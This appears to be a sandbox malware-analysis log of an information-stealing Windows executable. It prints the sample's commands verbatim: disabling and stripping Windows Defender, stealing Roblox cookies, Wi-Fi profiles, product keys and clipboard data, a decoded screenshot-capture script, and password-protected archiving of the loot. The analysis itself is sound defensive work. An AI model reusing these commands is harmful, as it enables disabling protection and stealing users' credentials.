              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA718E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 2_2_00007FF78DA592F0 FindFirstFileExW,FindClose,2_2_00007FF78DA592F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe Code function: 70_2_00007FF6AA1A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,70_2_00007FF6AA1A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe Code function: 70_2_00007FF6AA19E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe Code function: 70_2_00007FF6AA1E88E0 FindFirstFileExA,70_2_00007FF6AA1E88E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 2_2_00007FF8A87EF490 GetSystemInfo,2_2_00007FF8A87EF490
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxtray
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxservice
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: qemu-ga
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166661265.00000133FFD37000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"TEMEb
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareservicer`
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareuser
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B239000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397565293.000001F12B239000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extension
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmusrvc
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166661265.00000133FFD37000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: getmac.exe, 00000031.00000003.2165303776.00000133FFD35000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2165517081.00000133FFD3E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2166715661.00000133FFD3F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2164053046.00000133FFD34000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: getmac.exe, 00000031.00000003.2163438075.00000133FFD20000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2162447955.00000133FFD0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V{r
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmsrvc
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwarec
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwaretray
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2170342469.000001F12B288000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172233987.000001F12B234000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172692762.000001F12B23E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2401257690.000001F12B2E1000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2172584244.000001F12B235000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2171311912.000001F12B23E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2170342469.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA6A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78DA6A684
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA734F0 GetProcessHeap,0_2_00007FF78DA734F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA5C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF78DA5C910
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA5D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78DA5D19C
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA5D37C SetUnhandledExceptionFilter,0_2_00007FF78DA5D37C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe | Code function: 70_2_00007FF6AA1E4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00007FF6AA1E4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe | Code function: 70_2_00007FF6AA1DB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00007FF6AA1DB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe | Code function: 70_2_00007FF6AA1DA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,70_2_00007FF6AA1DA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe | Code function: 70_2_00007FF6AA1DB6D8 SetUnhandledExceptionFilter,70_2_00007FF6AA1DB6D8

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded
              $source = @"
              using System;
              using System.Collections.Generic;
              using System.Drawing;
              using System.Windows.Forms;
              public class Screenshot
              {
                  public static List<Bitmap> CaptureScreens()
                  {
                      var results = new List<Bitmap>();
                      var allScreens = Screen.AllScreens;
                      foreach (Screen screen in allScreens)
                      {
                          try
                          {
                              Rectangle bounds = screen.Bounds;
                              using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                              {
                                  using (Graphics graphics = Graphics.FromImage(bitmap))
                                  {
                                      graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                                  }
                                  results.Add((Bitmap)bitmap.Clone());
                              }
                          }
                          catch (Exception)
                          {
                              // Handle any exceptions here
                          }
                      }
                      return results;
                  }
              }
              "@
              Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
              $screenshots = [Screenshot]::CaptureScreens()
              for ($i = 0; $i -lt $screenshots.Count; $i++)
              {
                  $screenshot = $screenshots[$i]
                  $screenshot.Save("./Display ($($i+1)).png")
                  $screenshot.Dispose()
              }
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe Code function: 70_2_00007FF6AA1CB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,70_2_00007FF6AA1CB340
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA795E0 cpuid 0_2_00007FF78DA795E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
